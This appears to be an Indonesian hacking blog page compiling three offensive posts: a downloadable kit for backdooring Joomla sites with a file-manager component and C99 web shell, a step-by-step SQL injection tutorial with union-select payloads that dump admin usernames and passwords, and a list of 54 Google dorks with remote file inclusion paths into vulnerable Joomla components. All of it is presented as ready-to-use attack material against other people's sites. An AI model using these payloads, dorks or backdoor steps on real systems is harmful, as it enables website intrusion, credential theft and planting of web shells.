Backdooring With Joomla Explorer Pada Web Joomla

Include :

* Video ( Demo )
* com_joomlaxplorer_1.6.3 ( Joomla Component )
* C99 ( PHP File )
* Read Me ( txt )

DOWNLOAD

Note :
Khusus web Joomla

Jika Sukses Menginstall maka akan keluar informasi seperti berikut ini.

Information :




Successfully installed joomlaXplorer
joomlaXplorer is a powerful File- and FTP Manager script.
It allows

* Browsing Directories & Files,
* Editing, Copying, Moving and Deleting files,
* Searching, Uploading and Downloading files,
* Creating new Files and Directories,
* Creating and Extracting Archives with Files and Directories,
* Changing file permissions (chmod)

and much more.

Source

My SQL Injection Step By Step

Pengertian sql injection :

SQL Injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ‘ atau -
comments: /* atau –
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
=step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
contoh: [site]/berita.php?id=100′ atau
[site]/berita.php?id=-100

sehingga muncul pesan error seperti berikut (masih bnyak lagi):

==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya…
gunakan perintah : order by

contoh: [site]/berita.php?id=-100+order+by+1– atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)…
misal: [site]/berita.php?id=-100+order+by+1–
[site]/berita.php?id=-100+order+by+2–
[site]/berita.php?id=-100+order+by+3–
[site]/berita.php?id=-100+order+by+4–

sehingga muncul error atau hilang pesan error…
misal: [site]/berita.php?id=-100+order+by+9–

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8–

===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8–

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8– atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8–

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..

============
=step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables–

seumpama table yang muncul adalah “admin”

===========
=step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()–

=============
= step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa– >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa–

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

www.ascii-convert.co.cc

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E–

============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)–

contoh kata yang keluar adalah id,username,password

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin–

==============
= step Delapan:=
==============

tahap terakhir mencari halam admin atau login

selanjutnya terserah anda karena kekuasaan web ada di tangan anda…

Untuk Lebih Jelas Bisa Download Video Tutorial Ini Beserta File MySQL Injection

DOWNLOAD

anda langsung jalankan file ” SQL Injection.html ”

(Nb. mohon maaf apabila ada salah kata atau kekurangan dalam tutorial + video ini)

Salam

Gonzhack

Source

Bug Dork RFI Joomla

1---------------------------------------------------------------------------------
Google Dork:
inurl:"com_admin"


/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shell
2---------------------------------------------------------------------------------
Google Dork:
inurl:index.php?option=com_simpleboard


/components/com_simpleboard/file_upload.php?sbp=shell
3---------------------------------------------------------------------------------
Google Dork:
inurl:"com_hashcash"


/components/com_hashcash/server.php?mosConfig_absolute_path=shell
4---------------------------------------------------------------------------------
Google Dork:
inurl:"com_htmlarea3_xtd-c"


/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=shell
5---------------------------------------------------------------------------------
Google Dork:
inurl:"com_sitemap"


/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=shell
6---------------------------------------------------------------------------------
Google Dork:
inurl:"com_performs"


/components/com_performs/performs.php?mosConfig_absolute_path=shell
7---------------------------------------------------------------------------------
Google Dork:
inurl:"com_forum"


/components/com_forum/download.php?phpbb_root_path=
8---------------------------------------------------------------------------------
Google Dork:
inurl:"com_pccookbook"


/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=shell
9---------------------------------------------------------------------------------
Google Dork:
inurl:index.php?option=com_extcalendar


/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=shell
10--------------------------------------------------------------------------------
Google Dork:
inurl:"minibb"


/components/minibb/index.php?absolute_path=shell
11--------------------------------------------------------------------------------
Google Dork:
inurl:"com_smf"


/components/com_smf/smf.php?mosConfig_absolute_path=
P0C2 By Mr.aFiR:
/modules/mod_calendar.php?absolute_path=shell
12--------------------------------------------------------------------------------
Google Dork:
inurl:"com_pollxt"


/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=shell
13--------------------------------------------------------------------------------
Google Dork:
inurl:"com_loudmounth"


/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=shell
14--------------------------------------------------------------------------------
Google Dork:
inurl:"com_videodb"


/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=shel l
15--------------------------------------------------------------------------------
Google Dork:
inurl:index.php?option=com_pcchess


/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=shell
16--------------------------------------------------------------------------------
Google Dork:
inurl:"com_multibanners"


/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=sh ell
17--------------------------------------------------------------------------------
Google Dork:
inurl:"com_a6mambohelpdesk"


/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=shel l
18--------------------------------------------------------------------------------
Google Dork:
inurl:"com_colophon"


/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=shell
19--------------------------------------------------------------------------------
Google Dork:
inurl:"com_mgm"


/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=shell
20--------------------------------------------------------------------------------
Google Dork:
inurl:"com_mambatstaff"


/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=shell
21--------------------------------------------------------------------------------
Google Dork:
inurl:"com_securityimages"


/components/com_securityimages/configinsert.php?mosConfig_absolute_path=shell


/components/com_securityimages/lang.php?mosConfig_absolute_path=shell
22--------------------------------------------------------------------------------
Google Dork:
inurl:"com_artlinks"


/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=shell
23--------------------------------------------------------------------------------
Google Dork:
inurl:"com_galleria"


/components/com_galleria/galleria.html.php?mosConfig_absolute_path=shell
24--------------------------------------------------------------------------------
Google Dork:
inurl:"com_akocomment"


/akocomments.php?mosConfig_absolute_path=shell
25--------------------------------------------------------------------------------
Google Dork:
inurl:"com_cropimage"

/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=shell
26--------------------------------------------------------------------------------
Google Dork:
inurl:"com_kochsuite"

/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=shell
27--------------------------------------------------------------------------------
Google Dork:
inurl:"com_comprofiler"

/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=shell
28--------------------------------------------------------------------------------
Google Dork:
inurl:"com_zoom"

/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=shell


/components/com_zoom/includes/database.php?mosConfig_absolute_path=shell
29--------------------------------------------------------------------------------
Google Dork:
inurl:"com_serverstat"

/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=she ll
30--------------------------------------------------------------------------------
Google Dork:
inurl:"com_fm"

/components/com_fm/fm.install.php?lm_absolute_path=shell
31--------------------------------------------------------------------------------
Google Dork:
inurl:com_mambelfish


/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=shell
32--------------------------------------------------------------------------------
Google Dork:
inurl:com_lmo


/components/com_lmo/lmo.php?mosConfig_absolute_path=shell
33--------------------------------------------------------------------------------
Google Dork:
inurl:com_linkdirectory


/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_ path=shell
34--------------------------------------------------------------------------------
Google Dork:
inurl:com_mtree


/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h=shell
35--------------------------------------------------------------------------------
Google Dork:
inurl:com_jim

/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=shell
36--------------------------------------------------------------------------------
Google Dork:
inurl:com_webring


/administrator/components/com_webring/admin.webring.docs.php?component_dir=shell
37--------------------------------------------------------------------------------
Google Dork:
inurl:com_remository


/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
38--------------------------------------------------------------------------------
Google Dork:
inurl:com_babackup


/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=shell
39--------------------------------------------------------------------------------
Google Dork:
inurl:com_lurm_constructor


/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=shell
40--------------------------------------------------------------------------------
Google Dork:
inurl:com_mambowiki


/components/com_mambowiki/ MamboLogin.php?IP=shell
41--------------------------------------------------------------------------------
Google Dork:
inurl:com_a6mambocredits


/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=shell
42--------------------------------------------------------------------------------
Google Dork:
inurl:com_phpshop


/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=s hell
43--------------------------------------------------------------------------------
Google Dork:
inurl:com_cpg


/components/com_cpg/cpg.php?mosConfig_absolute_path=shell
44--------------------------------------------------------------------------------
Google Dork:
inurl:com_moodle


/components/com_moodle/moodle.php?mosConfig_absolute_path=shell
45--------------------------------------------------------------------------------
Google Dork:
inurl:com_extended_registration


/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=shell
46--------------------------------------------------------------------------------
Google Dork:
inurl:com_mospray


/components/com_mospray/scripts/admin.php?basedir=shell
47--------------------------------------------------------------------------------
Google Dork:
inurl:com_bayesiannaivefilter


/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=shell
48--------------------------------------------------------------------------------
Google Dork:
inurl:com_uhp


/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=shell
49--------------------------------------------------------------------------------
Google Dork:
inurl:com_peoplebook


/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=shell
50--------------------------------------------------------------------------------
Google Dork:
inurl:com_mmp


/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=shell
51--------------------------------------------------------------------------------
Google Dork:
inurl:com_reporter


/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=shell
52--------------------------------------------------------------------------------
Google Dork:
inurl:com_madeira


/components/com_madeira/img.php?url=shell
53--------------------------------------------------------------------------------
Google Dork:
inurl:com_jd-wiki


/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=shell
54--------------------------------------------------------------------------------
Google Dork:
inurl:com_bsq_sitestats


/components/com_bsq_sitestats/external/rssfeed.php?baseDir=shell


/com_bsq_sitestats/external/rssfeed.php?baseDir=shell